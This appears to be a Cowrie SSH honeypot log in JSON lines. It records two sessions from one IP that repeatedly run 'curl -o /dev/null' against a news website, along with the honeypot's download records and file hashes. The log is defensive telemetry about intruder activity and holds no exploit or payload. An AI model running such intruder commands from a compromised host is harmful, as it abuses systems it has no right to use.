{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.844255Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.866946Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.878908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.881115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.882518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.892816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.893805Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.930104Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.931331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.939084Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.942017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.943135Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.973979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.975263Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:22.984442Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:22.985518Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.012563Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.013813Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.024222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.025326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.049802Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.050993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.063509Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.064773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.085770Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.086965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.104935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.105965Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.130970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.132230Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.153444Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.154589Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.179156Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.180337Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.205001Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.206237Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.229387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.230633Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.238236Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.252521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.253692Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.272275Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.273307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.298305Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.300010Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.308737Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.335882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.336955Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.350399Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.351633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.359120Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.379884Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.381106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.398128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.399276Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.401801Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.423129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.424193Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.440012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.441059Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.466172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.468667Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.469935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.474331Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.506880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.508176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.513551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.514584Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.525678Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.543305Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.560779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.561787Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.564972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.565624Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.579989Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.589025Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.599436Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.600576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.605206Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.606004Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.621420Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.630791Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.642576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.643824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.649243Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.650234Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.688378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.689629Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.698443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.699561Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.731479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.732456Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.745046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.746106Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.771684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.772570Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.794284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.795273Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:23.817011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.818117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:23.841447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
